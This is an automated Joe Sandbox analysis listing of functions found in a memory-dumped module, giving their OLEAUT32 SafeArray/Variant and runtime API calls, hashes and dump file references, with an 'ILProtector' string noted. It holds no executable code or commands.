SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D0884D2
SafeArrayGetElement.OLEAUT32 ref: 6D08850A

Part of subcall function 6D083A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D083B71
Part of subcall function 6D083A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D083B83

Part of subcall function 6D0869C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6D086A08
Part of subcall function 6D0869C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D086A15
Part of subcall function 6D0869C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D086A41

SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEBF

Part of subcall function 6D07DFB0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6D07DFF6
Part of subcall function 6D07DFB0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D07E003
Part of subcall function 6D07DFB0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D07E02F

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArraySafe$Bound$Destroy$Element
String ID:
API String ID: 959723449-0
Opcode ID: 1b0b9c9b56c20b801209e024a6d16bd0f0330b9e49cb9bd116229214b7232a8f
Instruction ID: ff5a53ff26b78764e4b7d670c482ffeb2e8cdbaa0edead3bdcf5b4a822df5be8
Opcode Fuzzy Hash: 1b0b9c9b56c20b801209e024a6d16bd0f0330b9e49cb9bd116229214b7232a8f
Instruction Fuzzy Hash: A8C14270A042059FEF10DF68CC94FADB7B9AF85708F204599EA19EB287D775E940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6D084170 Relevance: 13.8, APIs: 9, Instructions: 277COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6D0841AF
VariantInit.OLEAUT32(?), ref: 6D0841B5
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D0841C0
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6D0841F5
VariantClear.OLEAUT32(?), ref: 6D084201
std::tr1::_Xweak.LIBCPMT ref: 6D084450
SafeArrayDestroy.OLEAUT32(?), ref: 6D08446D
VariantClear.OLEAUT32(?), ref: 6D08447D
VariantClear.OLEAUT32(?), ref: 6D084483

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
String ID:
API String ID: 1774866819-0
Opcode ID: 3a1fe72233d7d6a975789d942f083da7273c5dae7cfa234de4b2c33476ea8809
Instruction ID: c62238a3ffac3eed5861607e0852eff10256032f8239063fdd95252b10d37862
Opcode Fuzzy Hash: 3a1fe72233d7d6a975789d942f083da7273c5dae7cfa234de4b2c33476ea8809
Instruction Fuzzy Hash: 07B11875600609AFDB14DF98C884EAAB7F9BF8D310F15856CE50AAB791DA34F841CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6D08C850 Relevance: 13.8, APIs: 9, Instructions: 271COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6D08C88F
VariantInit.OLEAUT32(?), ref: 6D08C895
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D08C8A0
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6D08C8D5
VariantClear.OLEAUT32(?), ref: 6D08C8E1
std::tr1::_Xweak.LIBCPMT ref: 6D08CB1C
SafeArrayDestroy.OLEAUT32(?), ref: 6D08CB39
VariantClear.OLEAUT32(?), ref: 6D08CB49
VariantClear.OLEAUT32(?), ref: 6D08CB4F

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
String ID:
API String ID: 1774866819-0
Opcode ID: bb6ecb549276cbaf2966990928eb28bf8f44b4e064195e9b774700019c0e5c7a
Instruction ID: cc47f58bc4c486b74d5a4495c5ab2841adeedf41d7d2f623406b84b8bdb203bd
Opcode Fuzzy Hash: bb6ecb549276cbaf2966990928eb28bf8f44b4e064195e9b774700019c0e5c7a
Instruction Fuzzy Hash: 78B13A75600649AFDB14DFA8C884EBAB7F5BF8D310F15866CE606AB791C634F841CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6D08C530 Relevance: 13.8, APIs: 9, Instructions: 259COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6D08C56F
VariantInit.OLEAUT32(?), ref: 6D08C575
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D08C580
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D08C5B5
VariantClear.OLEAUT32(?), ref: 6D08C5C1
std::tr1::_Xweak.LIBCPMT ref: 6D08C7D4
SafeArrayDestroy.OLEAUT32(?), ref: 6D08C7F1
VariantClear.OLEAUT32(?), ref: 6D08C801
VariantClear.OLEAUT32(?), ref: 6D08C807

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
String ID:
API String ID: 1774866819-0
Opcode ID: c0272b824f8cc35c65e93fd775140c4aeec3131ac77bdd7c56335afebf4c8b35
Instruction ID: d86f36bd14e2c0a4bd3a562eaf340c01871b6c4af3182a1c4515c1a40173e44c
Opcode Fuzzy Hash: c0272b824f8cc35c65e93fd775140c4aeec3131ac77bdd7c56335afebf4c8b35
Instruction Fuzzy Hash: 59A14B75A00605AFDB14DF94C884EAAB7F9BF8D310F1585ADE506AB751C734F841CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6D086880 Relevance: 13.6, APIs: 9, Instructions: 117COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6D0868B2
VariantInit.OLEAUT32(?), ref: 6D0868BD
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6D0868D7
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D0868FD
VariantClear.OLEAUT32(?), ref: 6D086909
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D086923
SafeArrayDestroy.OLEAUT32(00000000), ref: 6D086981
VariantClear.OLEAUT32(?), ref: 6D08699E
VariantClear.OLEAUT32(?), ref: 6D0869A4

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Variant$ArraySafe$Clear$ElementInit$CreateDestroyVector
String ID:
API String ID: 3529038988-0
Opcode ID: 057099af13788f3a47a801f493ac4465a63809cdc16d0e21037913f5f24181e2
Instruction ID: 6f95e8634cd2a7a39247257f7047ff6e1e5d2852fbf3939f3e63b003a402412d
Opcode Fuzzy Hash: 057099af13788f3a47a801f493ac4465a63809cdc16d0e21037913f5f24181e2
Instruction Fuzzy Hash: 08418EB2900209AFDF00DFA4C884BEEBBB8FF99714F15415AE905E7241E775E901CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D07C020 Relevance: 12.3, APIs: 8, Instructions: 309COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6D07C074
VariantInit.OLEAUT32(?), ref: 6D07C07B
VariantInit.OLEAUT32(?), ref: 6D07C082
VariantInit.OLEAUT32(?), ref: 6D07C089
VariantClear.OLEAUT32(?), ref: 6D07C312
VariantClear.OLEAUT32(?), ref: 6D07C319
VariantClear.OLEAUT32(?), ref: 6D07C320
VariantClear.OLEAUT32(?), ref: 6D07C327

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Variant$ClearInit
String ID:
API String ID: 2610073882-0
Opcode ID: 8e8ce37e1f601d586d2100c8d658cc97104863c8a1d534e3d1ba81589b729aeb
Instruction ID: 276859e720854983d2b0f02f911ff5d72738b4fe7f6eb55e1004cb4d820a53b4
Opcode Fuzzy Hash: 8e8ce37e1f601d586d2100c8d658cc97104863c8a1d534e3d1ba81589b729aeb
Instruction Fuzzy Hash: 38C147716087019FE310DF68C880A2AB7E6FFC9304F248A5DF9989B365D735E845CB96

Uniqueness

Uniqueness Score: -1.00%

Function 6D0716B0 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 487COMMON

Download Yara Rule

APIs

Part of subcall function 6D0C9BB5: _malloc.LIBCMT ref: 6D0C9BCF

std::tr1::_Xweak.LIBCPMT ref: 6D071B53
std::_Xinvalid_argument.LIBCPMT ref: 6D071B5D
std::exception::exception.LIBCMT ref: 6D071C43
__CxxThrowException@8.LIBCMT ref: 6D071C58

Strings

invalid vector<T> subscript, xrefs: 6D071B58

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentXweak_mallocstd::_std::exception::exceptionstd::tr1::_
String ID: invalid vector<T> subscript
API String ID: 3098024973-3016609489
Opcode ID: b578ede6cf1f7a9e5867f261560abaa1e247522e8b3f8ece22529f4bb0041f15
Instruction ID: 43ad8200599927076a34c369dd7af2c2e8df9118fb1f26c066d0d39389a53960
Opcode Fuzzy Hash: b578ede6cf1f7a9e5867f261560abaa1e247522e8b3f8ece22529f4bb0041f15
Instruction Fuzzy Hash: 53222A71C0070A9FDB20CFA4C490AEEBBF5BF44314F11865DD55AAB390E774AA89CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D08908A Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEBF

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 0a62027278583f774155fa03a51486fb94f1ead76f221510e117231dc3c48d43
Instruction ID: 064fd2a9b778eb9d2b9ece9357b4af4ce44faee6e781b69c847f6a2bfd348bef
Opcode Fuzzy Hash: 0a62027278583f774155fa03a51486fb94f1ead76f221510e117231dc3c48d43
Instruction Fuzzy Hash: E5310874E006199FEF10DBA8CD80F6EB7F9AF89200F20859AE519E7292D775E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 03253EE0 Relevance: 7.8, Strings: 6, Instructions: 334COMMON

Download Yara Rule

Strings

(o^q, xrefs: 0325404A
Hbq, xrefs: 032542B9
,bq, xrefs: 0325401C
(o^q, xrefs: 0325403E
d8cq, xrefs: 032543A8
,bq, xrefs: 03254010

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$,bq$,bq$Hbq$d8cq
API String ID: 0-1626189073
Opcode ID: 13286822f41e3c7db15477af3db9091b8fd81fa098612a8ca7fbe0e1b1b4a1ef
Instruction ID: 3a20444eaa0f8154463ca0d6da03e17ca7230e9378227f23526590b928969fd4
Opcode Fuzzy Hash: 13286822f41e3c7db15477af3db9091b8fd81fa098612a8ca7fbe0e1b1b4a1ef
Instruction Fuzzy Hash: 0AC17E30B102159FCB14EF69D854AAEBBB6BF88750F148069F805E73A4DB30DD81CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D083C10 Relevance: 7.7, APIs: 5, Instructions: 186COMMON

Download Yara Rule

APIs

SafeArrayGetElement.OLEAUT32(?,?,400BD10B), ref: 6D083C49
VariantInit.OLEAUT32(?), ref: 6D083C81
VariantClear.OLEAUT32(?), ref: 6D083D26
VariantClear.OLEAUT32(?), ref: 6D083D30
VariantClear.OLEAUT32(?), ref: 6D083D89

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Variant$Clear$ArrayElementInitSafe
String ID:
API String ID: 4110538090-0
Opcode ID: 25a9483e87fc040db71ddf268d1c43bca008ceef305101991f0a8d26d8425c14
Instruction ID: 4aa48ec0da7ebb2e88f62234bf6636b2b58876f965857e2ac180835d333627ef
Opcode Fuzzy Hash: 25a9483e87fc040db71ddf268d1c43bca008ceef305101991f0a8d26d8425c14
Instruction Fuzzy Hash: 2B615C72A002499FDF00DFA8C880AAEB7B5FF8D310F258599E615EB351C731A945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6D07DB30 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(6D0831EC), ref: 6D07DB5E
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D07DB6E
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D07DB82
SafeArrayDestroy.OLEAUT32(00000000), ref: 6D07DBF1
VariantClear.OLEAUT32(?), ref: 6D07DBFB

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArraySafe$Variant$ClearCreateDestroyElementInitVector
String ID:
API String ID: 182531043-0
Opcode ID: 42e935a24d921e8783778b6303979e8addeb5200c239cdc024f45d6e778cfe92
Instruction ID: af1325303cc78ac1706ff948e142b7d32851e22d843efbd4ea9fe79aaef4c7bc
Opcode Fuzzy Hash: 42e935a24d921e8783778b6303979e8addeb5200c239cdc024f45d6e778cfe92
Instruction Fuzzy Hash: 04315E7AA00205EFDB00DF55C844FEAB7F9EF8A720F15819AE911AB340D735E901CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 6D091FD0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 175COMMON

Download Yara Rule

APIs

Part of subcall function 6D0C9BB5: _malloc.LIBCMT ref: 6D0C9BCF

std::exception::exception.LIBCMT ref: 6D092206
__CxxThrowException@8.LIBCMT ref: 6D092221

Part of subcall function 6D096480: __CxxThrowException@8.LIBCMT ref: 6D096518
Part of subcall function 6D096480: __CxxThrowException@8.LIBCMT ref: 6D096558

Strings

@-m .m, xrefs: 6D0921AD
ILProtector, xrefs: 6D092045

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Exception@8Throw$_mallocstd::exception::exception
String ID: @-m .m$ILProtector
API String ID: 84431791-332638736
Opcode ID: d64dbc2d81ae0bf4e52f399439504ea8db6cdcf2e53da9f36c5ebc6427bf3811
Instruction ID: d149ec4e9fd2685eb8854bcb8eaa3595a34ebfe77b406ea38b2f0d54b2114b4c
Opcode Fuzzy Hash: d64dbc2d81ae0bf4e52f399439504ea8db6cdcf2e53da9f36c5ebc6427bf3811
Instruction Fuzzy Hash: 46712875905259DFDB24CFA8D884BEEBBB4FB49304F1081AEE519A7340DB706A44CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D0CA42D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

__CRT_INIT@12.LIBCMT ref: 6D0CA463
__CRT_INIT@12.LIBCMT ref: 6D0CA493
__CRT_INIT@12.LIBCMT ref: 6D0CA4B3

Strings

a0, xrefs: 6D0CA4FF

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: T@12
String ID: a0
API String ID: 456891419-3188653782
Opcode ID: c27127a49bc57370f0234d65a869d222e3d93a744a26bed91b07257ef0e9aeaa
Instruction ID: 9fd564f4313cb27e9a3949b5e72c2f970068ad6030acc04ee158e537d46d27db
Opcode Fuzzy Hash: c27127a49bc57370f0234d65a869d222e3d93a744a26bed91b07257ef0e9aeaa
Instruction Fuzzy Hash: AA112470D04253AAFB309AB68C4CFBFBAFCABC2754F219414E525E7141D738C941CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D08C410 Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D08C478
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D08C488
SafeArrayGetElement.OLEAUT32(?,00000001,?), ref: 6D08C4B4
SafeArrayDestroy.OLEAUT32(?), ref: 6D08C512

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
